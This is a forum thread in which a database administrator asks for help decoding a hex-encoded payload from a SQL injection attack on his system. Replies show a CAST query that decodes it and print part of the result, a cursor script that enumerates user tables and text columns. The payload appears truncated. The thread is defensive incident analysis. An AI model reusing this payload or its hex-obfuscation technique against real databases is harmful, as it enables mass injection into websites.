An encoding I cannot put my finger on

Question

Post reply

An encoding I cannot put my finger on

Jim Mace

SSC Eights!

Points: 820
More actions
June 23, 2008 at 1:40 pm

#129669

We had a SQL injection attack, and I decoded what was within the CAST from originally (0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E2054616...) to this: (\u0030\u0078\u0034\u0034\u0034\u0035\u0034\u0033\u0034\u0043\u0034\u0031\u0035\u0032\u0034\u0035\u0032\u0030\u0034\u0030\u0035\u0034\u0032\u0030\u0035\u0036\u0034\u0031\u0035\u0032\u0034\u0033\u0034\u0038\u0034\u0031\u0035\u0032\u0032\u0038\u0033\u0032\u0033\u0035\u0033\u0035\u0032\u0039\u0032\u0043\u0034\u0030\u0034\u0033\u0032\u0030\u0035\u0036\u0034\u0031\u0035\u0032\u0034\u0033\u0034\u0038\u0034\u0031\u0035\u0032\u0032\u0038\u0033\u0032\u0033\u0035\u0033\u0035\u0032\u0039\u0032\u0030\u0034\u0034\u0034\u0035\u0034\u0033\u0034\u0043\u0034\u0031\u0035\u0032\u0034\u0035\u0032\u0030\u0035\u0034\u0036\u0031\u0036\u0032\u0036\u0043\u0036\u0035\u0035\u0046\u0034\u0033\u0037\u0035\u0037\u0032\u0037\u0033\u0036\u0046\u0037\u0032\u0032\u0030\u0034\u0033\u0035\u0035...)
I would like to decode this to see what it actually says. Can someone lead me in the right direction please?
Jim

Viewing 6 posts - 1 through 5 (of 5 total)

You must be logged in to reply to this topic. Login to reply

Todd Engen SSCrazy Eights Points: 9869 More actions · Answer 1

SELECT CAST(0x4445434C41524520405420 AS VARCHAR(MAX))

Make sure the binary representation has an even number of characters before decoding.

Jim Mace SSC Eights! Points: 820 More actions · Answer 2

OK. How do I actually know about decoding it, however?

Todd Engen SSCrazy Eights Points: 9869 More actions · Answer 3

Run that in a query window to get the statements that are represented.

For example, running this query using a truncated piece of your binary value:

[font="Courier New"]SELECT CAST(0x4445434C41524520405420 AS VARCHAR(MAX))[/font]

Returns this:

[font="Courier New"]DECLARE @T [/font]

Lynn Pettis SSC Guru Points: 442467 More actions · Answer 4

And just for the heck of it, here is more (slightly formatted):

DECLARE @T VARCHAR(255),

@C VARCHAR(255)

DECLARE Table_Cursor CURSOR

FOR SELECT a.name,b.name

FROM sysobjects a,syscolumns b

WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)

OPEN Ta

😎

Jim Mace SSC Eights! Points: 820 More actions · Answer 5

Jim Mace

SSC Eights!

Points: 820

June 24, 2008 at 10:53 am

#833466

Thank you very much.